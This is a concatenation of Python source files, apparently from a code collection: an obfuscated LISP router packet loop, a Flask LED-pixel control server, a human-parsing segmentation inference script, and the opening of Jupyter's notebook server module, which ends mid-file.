if 94 - 94: I1IiiI + iIii1I11I1II1 / O0 - OoooooooOO % I1ii11iIi11i
o0Oo0oo = [ i111I , oO0oIIII ,
II1Ii1iI1i , Oo0oO0oo0oO00 ]
if 44 - 44: I1IiiI % Ii1I * I1IiiI . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 6 - 6: IiII * OoooooooOO + I1Ii111 / Ii1I
if 35 - 35: ooOoO0o % I1IiiI - ooOoO0o - OoO0O00 - OoooooooOO
if 46 - 46: i1IIi . i1IIi . oO0o / I11i / ooOoO0o
Ii1Iiii = True
Oo = [ i111I ] * 3
i1IIii11i1I1 = [ II1Ii1iI1i ] * 3
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
while ( True ) :
try : OOOO , oO , ii1IIiII111I = select . select ( o0Oo0oo , [ ] , [ ] )
except : break
if 19 - 19: I1IiiI % Ii1I . IiII * ooOoO0o
if 89 - 89: OoOoOO00 . OOooOOo
if 7 - 7: oO0o % OoOoOO00 - I1IiiI + Oo0Ooo
if 70 - 70: II111iiii + I1Ii111 + i11iIiiIii - i1IIi / IiII
if ( lisp . lisp_ipc_data_plane and Oo0oO0oo0oO00 in OOOO ) :
lisp . lisp_process_punt ( Oo0oO0oo0oO00 , II1iII1i ,
iiI1iIiI )
if 40 - 40: I1ii11iIi11i * I1Ii111
if 38 - 38: O0 . Oo0Ooo + OoOoOO00 - oO0o
if 43 - 43: iII111i + Oo0Ooo / OoooooooOO
if 24 - 24: O0 + o0oOOo0O0Ooo * Ii1I - I1Ii111
if 10 - 10: i11iIiiIii
if ( i111I in OOOO ) :
O00OoOoO , II11 , O00oooo00o0O , ii11iO000oo00OOOOO = lisp . lisp_receive ( Oo [ 0 ] ,
False )
if ( II11 == "" ) : break
if 52 - 52: Oo0Ooo . I11i / o0oOOo0O0Ooo + Ii1I % I11i
if ( lisp . lisp_is_rloc_probe_reply ( ii11iO000oo00OOOOO [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 47 - 47: OoooooooOO / OOooOOo % OoO0O00 / Oo0Ooo - I1ii11iIi11i
lisp . lisp_parse_packet ( Oo , ii11iO000oo00OOOOO , II11 , O00oooo00o0O )
if 13 - 13: iII111i . I1IiiI * OOooOOo + Ii1I + I1IiiI - i11iIiiIii
if 79 - 79: ooOoO0o . oO0o / oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if ( II1Ii1iI1i in OOOO ) :
O00OoOoO , II11 , O00oooo00o0O , ii11iO000oo00OOOOO = lisp . lisp_receive ( i1IIii11i1I1 [ 0 ] ,
False )
if ( II11 == "" ) : break
if 52 - 52: OoO0O00 * OoooooooOO
if ( lisp . lisp_is_rloc_probe_reply ( ii11iO000oo00OOOOO [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
o0OO0oooo = lisp . lisp_parse_packet ( i1IIii11i1I1 , ii11iO000oo00OOOOO , II11 , O00oooo00o0O )
if 40 - 40: I1Ii111 - OoOoOO00 * I11i - IiII / OoOoOO00
if 71 - 71: oO0o / OoooooooOO % IiII / OoOoOO00 % I1Ii111
if 19 - 19: I1Ii111 + IiII / oO0o / II111iiii
if 92 - 92: i1IIi % ooOoO0o + ooOoO0o - iIii1I11I1II1 . Ii1I
if 33 - 33: o0oOOo0O0Ooo / O0 + OOooOOo
if ( o0OO0oooo ) :
I11iiI11iiI = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( 0 , I11iiI11iiI )
if 75 - 75: IiII % i11iIiiIii + iIii1I11I1II1
if 92 - 92: OoOoOO00 % O0
if 55 - 55: iIii1I11I1II1 * iII111i
if 85 - 85: iIii1I11I1II1 . II111iiii
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if ( oO0oIIII in OOOO ) :
O00OoOoO , II11 , O00oooo00o0O , ii11iO000oo00OOOOO = lisp . lisp_receive ( oO0oIIII , True )
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if ( II11 == "" ) : break
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if ( O00OoOoO == "command" ) :
if ( ii11iO000oo00OOOOO == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 94 - 94: i1IIi
if ( ii11iO000oo00OOOOO . find ( "nonce%" ) != - 1 ) :
iIII11I1I1II ( ii11iO000oo00OOOOO )
continue
if 36 - 36: I1IiiI + Oo0Ooo
lispconfig . lisp_process_command ( oO0oIIII , O00OoOoO ,
ii11iO000oo00OOOOO , "lisp-itr" , [ I1IiII1I1i1I1 ] )
elif ( O00OoOoO == "api" ) :
lisp . lisp_process_api ( "lisp-itr" , oO0oIIII , ii11iO000oo00OOOOO )
elif ( O00OoOoO == "data-packet" ) :
O0oOo00o0 ( ii11iO000oo00OOOOO , "ipc" )
else :
if ( lisp . lisp_is_rloc_probe_reply ( ii11iO000oo00OOOOO [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe request, using pcap" )
continue
if 46 - 46: iII111i
lisp . lisp_parse_packet ( II1iII1i , ii11iO000oo00OOOOO , II11 , O00oooo00o0O )
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
II1Ii11I111I ( )
lisp . lisp_print_banner ( "ITR normal exit" )
exit ( 0 )
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
opcBridge.py
|
import opc
import time
import os
import socket
import json
import threading
import queue
import datetime
import numpy as np
import yaml
from flask import Flask, request
from flask_restful import Resource, Api, reqparse
import logging
import requests
############################SUPPORT FUNCTIONS###################################
def getLocalIP():
'''Get our IP address'''
ipSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
ipSock.connect(('10.255.255.255', 1))
localIP = ipSock.getsockname()[0]
print('Local IP set to', localIP)
except Exception as e:
print(e)
print('Local IP detection failed, listening on localhost')
localIP = '127.0.0.1'
ipSock.close()
return localIP
def pixelsToJson(npArray):
'''numPy arrays do not cleanly serialize. This takes our numPy array and converts
to a standard python list so that we can easily dump it as JSON'''
lstOut = []
for i in npArray:
lstOut.append([int(i[0]), int(i[1]), int(i[2])])
return lstOut
def makeEightBit(value):
return min(255, max(0, int(value)))
def rgbSetBrightness(setBri, rgb):
currentBri = max(rgb)
if currentBri == 0:
ratio = 0
else:
ratio = setBri / currentBri
rgbOut = [rgb[0] * ratio, rgb[1] * ratio, rgb[2] * ratio]
return rgbOut
def brightnessChange(rgb, magnitude):
'''Will take an RGB value and a brigtness change and spit out what its final value should be'''
currentBri = max(rgb)
if currentBri:
newBri = currentBri + magnitude
newBri = min(255, max(0, int(newBri)))
if not newBri:
newBri = 1
if currentBri == newBri:
return rgb
rgbOut = rgbSetBrightness(newBri, rgb)
return rgbOut
else:
return rgb
################################################################################
class PSU:
def __init__(self, ip, index, port=8001):
self.ip = ip
self.port = port
self.index = index
self.state = False
def switch(self, state):
'''Switch relay attached to lighting PSU'''
try:
params = {'index': self.index, 'state': state}
requests.get('http://' + self.ip + ':' + str(self.port) + '/switch', json=params, timeout=3)
self.state = state
except Exception as e:
print('Failed to connect to relay processor')
print(e)
def checkPixels(self, pixels):
'''Crawl down pixel array, if any value is above 0 return true
Used in conjunction with self.switch to kill power to PSU if lights are off'''
for pix in pixels:
for color in pix:
if color > 0:
return True
return False
def update(self, pixels):
'''If pixel array has no lights on, kill its associated PSU'''
if self.checkPixels(pixels):
if not self.state:
print('Spinning up PSU')
self.switch(True)
else:
if self.state:
print('Killing PSU')
self.switch(False)
class Renderer:
def __init__(self, frameRate, PSU=False):
#Current value of pixels being submitted to opc
self.pixels = np.zeros((512, 3), dtype='float32')
#Differential array: stores difference between this frame and the next
self.diff = diff = np.zeros((512, 3), dtype='float32' )
#End values: where the final frame should end up
self.endVals = np.zeros((512, 3), dtype='float32')
#Remaining number of frames for each pixel
self.remaining = np.zeros((512), dtype='uint16')
#Used to sleep thread when there is no rendering to be done
self.clockerActive = threading.Event()
#Queue of commands to be executed
#API handler thread produces commands, Render Loop consumes them
self.commands = queue.Queue(maxsize=100)
#TODO: Make framerate and opcClient ip configurable
self.frameRate = frameRate
self.opcClient = opc.Client('localhost:7890')
self.renderLoop = threading.Thread(target=self.render)
self.renderLoop.daemon = True
self.PSU = PSU
def absoluteFade(self, rgb, indexes, fadeTime):
'''Take pixels marked in indexes and fade them to value in rgb over
fadeTime amount of time'''
#If the fadeTime is 0, we still want at least 2 frames
#If only one frame, the interpolation engine will produce slow fade
if not fadeTime:
fadeTime = 2 / self.frameRate
frames = int(fadeTime * self.frameRate)
for i in indexes:
self.remaining[i] = frames
for c in range(3):
self.diff[i][c] = (rgb[c] - self.pixels[i][c]) / frames
self.endVals[i] = rgb
def multiCommand(self, commandList):
'''Multicommand format: [indexes, rgb value, fadetime]
allows for multiple different pixels to be set to multiple different values
this is more efficent than stringing individual commands together'''
for x in commandList:
#Which pixels are being controlled?
indexes = x[0]
#How much time does it take to complete?
frames = int(x[2] * self.frameRate)
if not frames:
frames = 2
#What color are we fading to?
rgb = x[1]
for i in indexes:
self.remaining[i] = frames
for c in range(3):
self.diff[i][c] = (rgb[c] - self.pixels[i][c]) / frames
self.endVals[i] = rgb
def relativeFade(self, magnitude, indexes, fadeTime):
'''fade value up or down relative to current pixel values'''
commandList = []
for i in indexes:
endVal = brightnessChange(self.pixels[i], magnitude)
commandList.append([[i], endVal, fadeTime])
self.multiCommand(commandList)
def executeCommands(self):
'''Take all commands out of command queue and execute them'''
if self.PSU and not self.commands.empty():
self.PSU.update(self.pixels)
while not self.commands.empty():
newCommand, args = self.commands.get()
try:
newCommand(*args)
except Exception as e:
print('Command failed!')
logError(str(e))
def render(self):
'''Primary rendering loop, takes commands from API handler at start and
submits frames at end'''
print('Initiating Render Loop...')
while True:
now = time.perf_counter()
self.executeCommands()
anyRemaining = False
for pix in range(512):
if not self.remaining[pix]:
pass
elif self.remaining[pix] > 1:
for i in range(3):
self.pixels[pix][i] += self.diff[pix][i]
self.remaining[pix] -= 1
anyRemaining = True
elif self.remaining[pix] == 1:
self.pixels[pix] = self.endVals[pix]
self.remaining[pix] -= 1
anyRemaining = True
try:
self.opcClient.put_pixels(self.pixels)
except Exception as e:
print('Unable to contact opc Client')
cycleTime = time.perf_counter() - now
time.sleep(max((1 / self.frameRate) - cycleTime, 0))
if not anyRemaining:
if self.PSU:
self.PSU.update(self.pixels)
if self.commands.empty():
self.clockerActive.clear()
print('Sleeping render loop...')
self.clockerActive.wait()
if __name__ == '__main__':
#########################LOAD IN USER CONFIG####################################
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'opcConfig.yml')) as f:
configFile = f.read()
configs = yaml.safe_load(configFile)
##################SERVER LOGGING AND REPORTING FUNCTIONS########################
def logError(err):
print(err)
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'opcBridge-log.txt'), 'a') as logFile:
logFile.write(err)
logFile.write('\n')
bootMsg = 'Server booted at ' + str(datetime.datetime.now()) + '\n'
logError(bootMsg)
psu = PSU(configs['PSUs']['ip'], configs['PSUs']['index'], port=configs['PSUs']['port'])
renderer = Renderer(configs['framerate'], PSU=psu)
flaskServer = Flask(__name__)
api = Api(flaskServer)
localIP = getLocalIP()
port = 8000
arbitration = [False, '127.0.0.1']
parser = reqparse.RequestParser()
#########################VARIOUS COMMAND FIELDS#########################
parser.add_argument('fadetime', type=float, help='How long will this fade take?')
parser.add_argument('indexes', type=json.loads, help='Which pixels are targeted')
parser.add_argument('id', type=str, help='Arbtration ID')
parser.add_argument('ip', type=str, help='IP address of client')
parser.add_argument('rgb', type=json.loads, help='Target color')
parser.add_argument('magnitude', type=float, help='Size of fade')
parser.add_argument('commandlist', type=json.loads, help='List of commands for a multicommand')
###################COMMAND TYPE HANDLING########################################
class Pixels(Resource):
def get(self):
'''Gives the entire pixel array back to the client as a 512 * 3 array'''
print('\nSending pixels to %s \n' % request.remote_addr)
message = pixelsToJson(pixels)
return message
class Arbitration(Resource):
def put(self):
args = parser.parse_args()
id = args['id']
ip = request.remote_addr
print('\nGiving arbitration to %s from %s\n' % (id, ip))
arbitration[0] = id
arbitration[1] = ip
def get(self):
args = parser.parse_args()
id = args['id']
ip = request.remote_addr
print('\nSending arbitration to %s for %s\n' % (ip, id))
if id != arbitration[0]:
return False
elif ip != arbitration[1]:
return False
else:
return True
class AbsoluteFade(Resource):
'''Is given a color to fade to, and executes fade'''
def get(self):
args = parser.parse_args()
fadeTime = args['fadetime']
rgb = args['rgb']
indexes = args['indexes']
renderer.commands.put((renderer.absoluteFade, [rgb, indexes, fadeTime]))
renderer.clockerActive.set()
class MultiCommand(Resource):
'''Is given a list of indexes, associated values and fade times
executes them all in one action. This is much more efficent than
several absoluteFade commands strung together'''
def get(self):
args = parser.parse_args()
commandList = args['commandlist']
renderer.commands.put((renderer.multiCommand, [commandList]))
renderer.clockerActive.set()
class RelativeFade(Resource):
'''Is given a brightness change, and alters the brightness, likely unpredicatable
behavior if called in the middle of another fade'''
def get(self):
args = parser.parse_args()
indexes = args['indexes']
magnitude = args['magnitude']
fadeTime = args['fadetime']
renderer.commands.put((renderer.relativeFade, [magnitude, indexes, fadeTime]))
renderer.clockerActive.set()
api.add_resource(Pixels, '/pixels')
api.add_resource(Arbitration, '/arbitration')
api.add_resource(AbsoluteFade, '/absolutefade')
api.add_resource(MultiCommand, '/multicommand')
api.add_resource(RelativeFade, '/relativefade')
psu.switch(True)
#Test pattern to indicate server is up and running
testPatternOff = np.zeros((512, 3))
testPatternRed = np.full((512, 3), [64,0,0])
renderer.opcClient.put_pixels(testPatternRed)
renderer.opcClient.put_pixels(testPatternRed)
time.sleep(.5)
renderer.opcClient.put_pixels(testPatternOff)
renderer.opcClient.put_pixels(testPatternOff)
time.sleep(.5)
renderer.opcClient.put_pixels(testPatternRed)
renderer.opcClient.put_pixels(testPatternRed)
time.sleep(.5)
renderer.opcClient.put_pixels(testPatternOff)
renderer.opcClient.put_pixels(testPatternOff)
del testPatternOff
del testPatternRed
renderer.renderLoop.start()
flaskServer.run(host=localIP, port=port, debug=False)
|
inference_folder.py
|
# Standard libraries
import timeit
from pathlib import Path
from glob import glob
from datetime import datetime
import os
import sys
from collections import OrderedDict
import argparse
from typing import List
sys.path.append('./')
# PyTorch
import torch
torch.set_num_threads(1)
from torch.autograd import Variable
import torch.nn.functional as F
import torch.utils.data
from torchvision import transforms
torch.set_grad_enabled(False)
# Other third-party libraries
import numpy as np
from PIL import Image
import cv2
cv2.setNumThreads(0)
from tqdm import tqdm
# Custom imports
from networks import deeplab_xception_transfer, graph
from dataloaders import custom_transforms as tr
label_colours = [(0,0,0)
, (128,0,0), (255,0,0), (0,85,0), (170,0,51), (255,85,0), (0,0,85), (0,119,221), (85,85,0), (0,85,85), (85,51,0), (52,86,128), (0,128,0)
, (0,0,255), (51,170,221), (0,255,255), (85,255,170), (170,255,85), (255,255,0), (255,170,0)]
def flip_cihp(tail_list):
"""
Swap channels in a probability map so that "left foot" becomes "right foot" etc.
tail_list: (B x n_class x h x w)
"""
return torch.cat((
tail_list[:, :14],
tail_list[:, 14:15],
tail_list[:, 15:16],
tail_list[:, 17:18],
tail_list[:, 16:17],
tail_list[:, 19:20],
tail_list[:, 18:19]), dim=1)
def decode_labels(mask, num_images=1, num_classes=20):
"""Decode batch of segmentation masks.
Args:
mask: result of inference after taking argmax.
num_images: number of images to decode from the batch.
num_classes: number of classes to predict (including background).
Returns:
A batch with num_images RGB images of the same size as the input.
"""
n, h, w = mask.shape
assert (n >= num_images), 'Batch size %d should be greater or equal than number of images to save %d.' % (
n, num_images)
outputs = np.zeros((num_images, h, w, 3), dtype=np.uint8)
for i in range(num_images):
img = Image.new('RGB', (len(mask[i, 0]), len(mask[i])))
pixels = img.load()
for j_, j in enumerate(mask[i, :, :]):
for k_, k in enumerate(j):
if k < num_classes:
pixels[k_, j_] = label_colours[k]
outputs[i] = np.array(img)
return outputs
def read_img(img_path):
_img = Image.open(img_path).convert('RGB') # return is RGB pic
return _img
def img_transform(img, transform):
sample = {'image': img, 'label': 0}
sample = transform(sample)
return sample['image']
def save_image(image, path):
path.parent.mkdir(parents=True, exist_ok=True)
cv2.imwrite(str(path), image)
if __name__ == '__main__':
'''argparse begin'''
parser = argparse.ArgumentParser()
parser.add_argument('--model_path', required=True, type=Path,
help="Where the model weights are.")
parser.add_argument('--images_path', required=True, type=Path,
help="Where to look for images. Can be a file with a list of paths, or a " \
"directory (will be searched recursively for png/jpg/jpeg files).")
parser.add_argument('--output_dir', required=True, type=Path,
help="A directory where to save the results. Will be created if doesn't exist.")
parser.add_argument('--common_prefix', type=Path,
help="Common prefix relative to which save the output files.")
parser.add_argument('--tta', default='1,0.75,0.5,1.25,1.5,1.75', type=str,
help="A list of scales for test-time augmentation.")
parser.add_argument('--save_extra_data', action='store_true',
help="Save parts' segmentation masks, colored segmentation masks and images with removed background.")
opts = parser.parse_args()
net = deeplab_xception_transfer.deeplab_xception_transfer_projection_savemem(n_classes=20,
hidden_layers=128,
source_classes=7, )
# Initialize saver processes
import multiprocessing
class ConstrainedTaskPool:
def __init__(self, num_processes=1, max_tasks=100):
self.num_processes = num_processes
self.task_queue = multiprocessing.Queue(maxsize=max_tasks)
def __enter__(self):
def worker_function(task_queue):
for function, args in iter(task_queue.get, 'STOP'):
function(*args)
for _ in range(self.num_processes):
multiprocessing.Process(target=worker_function, args=(self.task_queue,)).start()
return self
def __exit__(self, *args):
for _ in range(self.num_processes):
self.task_queue.put('STOP')
def put_async(self, function, *args):
self.task_queue.put((function, args))
with ConstrainedTaskPool(num_processes=4, max_tasks=6000) as background_saver:
def save_image_async(image, path):
background_saver.put_async(save_image, image, path)
net.load_source_model(torch.load(opts.model_path))
net.cuda()
# adj
adj2_ = torch.from_numpy(graph.cihp2pascal_nlp_adj).float()
adj2_test = adj2_.unsqueeze(0).unsqueeze(0).expand(1, 1, 7, 20).cuda().transpose(2, 3)
adj1_ = Variable(torch.from_numpy(graph.preprocess_adj(graph.pascal_graph)).float())
adj3_test = adj1_.unsqueeze(0).unsqueeze(0).expand(1, 1, 7, 7).cuda()
cihp_adj = graph.preprocess_adj(graph.cihp_graph)
adj3_ = Variable(torch.from_numpy(cihp_adj).float())
adj1_test = adj3_.unsqueeze(0).unsqueeze(0).expand(1, 1, 20, 20).cuda()
net.eval()
image_paths_list: List[Path]
if opts.images_path.is_file():
print(f"`--images_path` ({opts.images_path}) is a file, reading it for a list of files...")
with open(opts.images_path, 'r') as f:
image_paths_list = sorted(Path(line.strip()) for line in f)
if opts.common_prefix is None:
common_prefix = os.path.commonpath(image_paths_list)
else:
common_prefix= opts.common_prefix
for path in image_paths_list:
# TODO optimize by using commonpath
assert common_prefix in path.parents
elif opts.images_path.is_dir():
print(f"`--images_path` ({opts.images_path}) is a directory, recursively looking for images in it...")
def list_files_recursively(path, allowed_extensions):
retval = []
for child in path.iterdir():
if child.is_dir():
retval += list_files_recursively(child, allowed_extensions)
elif child.suffix.lower() in allowed_extensions:
retval.append(child)
return retval
image_paths_list = sorted(list_files_recursively(opts.images_path, ('.png', '.jpg', '.jpeg')))
common_prefix = opts.images_path
else:
raise FileNotFoundError(f"`--images_path` ('{opts.images_path}')")
print(f"Found {len(image_paths_list)} images")
print(f"Will output files in {opts.output_dir} with names relative to {common_prefix}.")
print(f"Example:")
print(f"The segmentation for: {image_paths_list[0]}")
print(f"Will be put in: {opts.output_dir / image_paths_list[0].relative_to(common_prefix).parent}")
tta = opts.tta
try:
tta = tta.split(',')
tta = list(map(float, tta))
except:
raise ValueError(f'tta must be a sequence of comma-separated float values such as "1.0,0.5,1.5". Got "{opts.tta}".')
scale_list = tta
# 1.0 should always go first
try:
scale_list.remove(1.0)
except ValueError:
pass
scale_list.insert(0, 1.0)
class InferenceDataset(torch.utils.data.Dataset):
def __init__(self, img_paths, scale_list):
self.img_paths = img_paths
self.scale_list = scale_list
def __len__(self):
return len(self.img_paths)
def __getitem__(self, idx):
image_path = self.img_paths[idx]
img = read_img(image_path)
original_size = torch.tensor(img.size) # to make `default_collate` happy
img = img.resize((256, 256))
img_flipped = img_transform(img, tr.HorizontalFlip_only_img())
retval, retval_flipped = [], []
for scale in self.scale_list:
transform = transforms.Compose([
tr.Scale_only_img(scale),
tr.Normalize_xception_tf_only_img(),
tr.ToTensor_only_img()])
retval.append(img_transform(img, transform))
retval_flipped.append(img_transform(img_flipped, transform))
# `str()` because `default_collate` doesn't like `Path`
return retval, retval_flipped, str(image_path), original_size
dataset = InferenceDataset(image_paths_list, scale_list)
dataloader = torch.utils.data.DataLoader(dataset, batch_size=8, num_workers=2)
exec_times = []
for sample_idx, (images, images_flipped, image_paths, original_sizes) in enumerate(dataloader):
# `images`, `images_flipped`: list of length <number-of-scales>,
# each element is a tensor of shape (<batch-size> x 3 x H_k x W_k);
# `image_paths`: tuple of length <batch-size> of str
# `original_size`: int tensor of shape (<batch-size> x 2)
if sample_idx % 10 == 0:
import datetime
print(f"{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}: {sample_idx} / {len(dataloader)}")
original_sizes = [tuple(original_size.tolist()) for original_size in original_sizes]
image_paths = [Path(x).relative_to(common_prefix) for x in image_paths]
batch_size = len(images[0])
print("images", images[0].size())
print("batch_size", batch_size)
start_time = timeit.default_timer()
for iii, (image, image_flipped) in enumerate(zip(images, images_flipped)):
inputs = torch.cat((image, image_flipped))
print("Input Sizes", inputs.size(), image.size(), image_flipped.size(), inputs[0, :,0,0])
if iii == 0:
_, _, h, w = inputs.shape
inputs = inputs.cuda()
outputs = net.forward(inputs, adj1_test.cuda(), adj3_test.cuda(), adj2_test.cuda())
print("Output Sizes",outputs.size())
outputs = (outputs[:batch_size] + torch.flip(flip_cihp(outputs[batch_size:]), dims=[-1,])) / 2
print("Post Output Sizes",outputs.size())
if iii > 0:
outputs = F.upsample(outputs, size=(h, w), mode='bilinear', align_corners=True)
outputs_final = outputs_final + outputs
print("WTF")
else:
outputs_final = outputs
# outputs_final: `B x 20 x H x W`
end_time = timeit.default_timer()
exec_times.append(end_time - start_time)
# Actually write the outputs to disk
if opts.save_extra_data:
predictions = torch.max(outputs_final, 1)[1]
results = predictions.cpu().numpy()
vis_results = decode_labels(results)
for input_image_1xScale, vis_result, result, image_path \
in zip(images[0], vis_results, results, image_paths):
# saving grayscale mask image
save_image_async(result, opts.output_dir / 'mask_gray' / image_path.with_suffix('.png'))
# saving colored mask image
save_image_async(vis_result, opts.output_dir / 'mask_color' / image_path.with_suffix('.png'))
# saving segmented image with masked pixels drawn black
segmented_img = np.asarray(input_image_1xScale * 0.5 + 0.5) * (result > 0).astype(np.float)[np.newaxis]
save_image_async(
segmented_img.transpose(1,2,0) * 255,
opts.output_dir / 'segmented' / image_path.with_suffix('.png'))
else:
background_probability = 1.0 - outputs_final.softmax(1)[:, 0] # `B x H x W`
background_probability = (background_probability * 255).round().byte().cpu().numpy()
for background_probability_single_sample, image_path, original_size \
in zip(background_probability, image_paths, original_sizes):
output_image_path = opts.output_dir / image_path.with_suffix('.png')
save_image_async(
cv2.resize(background_probability_single_sample, original_size), output_image_path)
print('Average inference time:', np.mean(exec_times))
|
notebookapp.py
|
# coding: utf-8
"""A tornado based Jupyter notebook server."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import absolute_import, print_function
import notebook
import binascii
import datetime
import errno
import importlib
import io
import json
import logging
import mimetypes
import os
import random
import re
import select
import signal
import socket
import sys
import threading
import warnings
import webbrowser
try: #PY3
from base64 import encodebytes
except ImportError: #PY2
from base64 import encodestring as encodebytes
from jinja2 import Environment, FileSystemLoader
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 3.1.0
msg = "The Jupyter Notebook requires tornado >= 4.0"
try:
import tornado
except ImportError:
raise ImportError(msg)
try:
version_info = tornado.version_info
except AttributeError:
raise ImportError(msg + ", but you have < 1.1.0")
if version_info < (4,0):
raise ImportError(msg + ", but you have %s" % tornado.version)
from tornado import httpserver
from tornado import web
from tornado.httputil import url_concat
from tornado.log import LogFormatter, app_log, access_log, gen_log
from notebook import (
DEFAULT_STATIC_FILES_PATH,
DEFAULT_TEMPLATE_PATH_LIST,
__version__,
)
# py23 compatibility
try:
raw_input = raw_input
except NameError:
raw_input = input
from .base.handlers import Template404, RedirectWithParams
from .log import log_request
from .services.kernels.kernelmanager import MappingKernelManager
from .services.config import ConfigManager
from .services.contents.manager import ContentsManager
from .services.contents.filemanager import FileContentsManager
from .services.contents.largefilemanager import LargeFileManager
from .services.sessions.sessionmanager import SessionManager
from .auth.login import LoginHandler
from .auth.logout import LogoutHandler
from .base.handlers import FileFindHandler
from traitlets.config import Config
from traitlets.config.application import catch_config_error, boolean_flag
from jupyter_core.application import (
JupyterApp, base_flags, base_aliases,
)
from jupyter_core.paths import jupyter_config_path
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager, NoSuchKernel, NATIVE_KERNEL_NAME
from jupyter_client.session import Session
from nbformat.sign import NotebookNotary
from traitlets import (
Dict, Unicode, Integer, List, Bool, Bytes, Instance,
TraitError, Type, Float, observe, default, validate
)
from ipython_genutils import py3compat
from jupyter_core.paths import jupyter_runtime_dir, jupyter_path
from notebook._sysinfo import get_sys_info
from ._tz import utcnow
from .utils import url_path_join, check_pid, url_escape
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_examples = """
jupyter notebook # start the notebook
jupyter notebook --certfile=mycert.pem # use SSL/TLS certificate
jupyter notebook password # enter a password to protect the server
"""
DEV_NOTE_NPM = """It looks like you're running the notebook from source.
If you're working on the Javascript of the notebook, try running
npm run build:watch
in another terminal window to have the system incrementally
watch and build the notebook's JavaScript for you, as you make changes.
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
name = 'notebook.' + name
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, log,
base_url, default_url, settings_overrides, jinja_env_options):
# If the user is running the notebook in a git directory, make the assumption
# that this is a dev install and suggest to the developer `npm run build:watch`.
base_dir = os.path.realpath(os.path.join(__file__, '..', '..'))
dev_mode = os.path.exists(os.path.join(base_dir, '.git'))
if dev_mode:
log.info(DEV_NOTE_NPM)
settings = self.init_settings(
jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager, config_manager, log, base_url,
default_url, settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
super(NotebookWebApplication, self).__init__(handlers, **settings)
def init_settings(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager,
log, base_url, default_url, settings_overrides,
jinja_env_options=None):
_template_path = settings_overrides.get(
"template_path",
jupyter_app.template_file_path,
)
if isinstance(_template_path, py3compat.string_types):
_template_path = (_template_path,)
template_path = [os.path.expanduser(path) for path in _template_path]
jenv_opt = {"autoescape": True}
jenv_opt.update(jinja_env_options if jinja_env_options else {})
env = Environment(loader=FileSystemLoader(template_path), **jenv_opt)
sys_info = get_sys_info()
if sys_info['commit_source'] == 'repository':
# don't cache (rely on 304) when working from master
version_hash = ''
else:
# reset the cache on server restart
version_hash = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
if jupyter_app.ignore_minified_js:
log.warning("""The `ignore_minified_js` flag is deprecated and no
longer works. Alternatively use `npm run build:watch` when
working on the notebook's Javascript and LESS""")
warnings.warn("The `ignore_minified_js` flag is deprecated and will be removed in Notebook 6.0", DeprecationWarning)
now = utcnow()
root_dir = contents_manager.root_dir
home = os.path.expanduser('~')
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = '~' + root_dir[len(home):]
settings = dict(
# basics
log_function=log_request,
base_url=base_url,
default_url=default_url,
template_path=template_path,
static_path=jupyter_app.static_file_path,
static_custom_path=jupyter_app.static_custom_path,
static_handler_class = FileFindHandler,
static_url_prefix = url_path_join(base_url,'/static/'),
static_handler_args = {
# don't cache custom.js
'no_cache_paths': [url_path_join(base_url, 'static', 'custom')],
},
version_hash=version_hash,
ignore_minified_js=jupyter_app.ignore_minified_js,
# rate limits
iopub_msg_rate_limit=jupyter_app.iopub_msg_rate_limit,
iopub_data_rate_limit=jupyter_app.iopub_data_rate_limit,
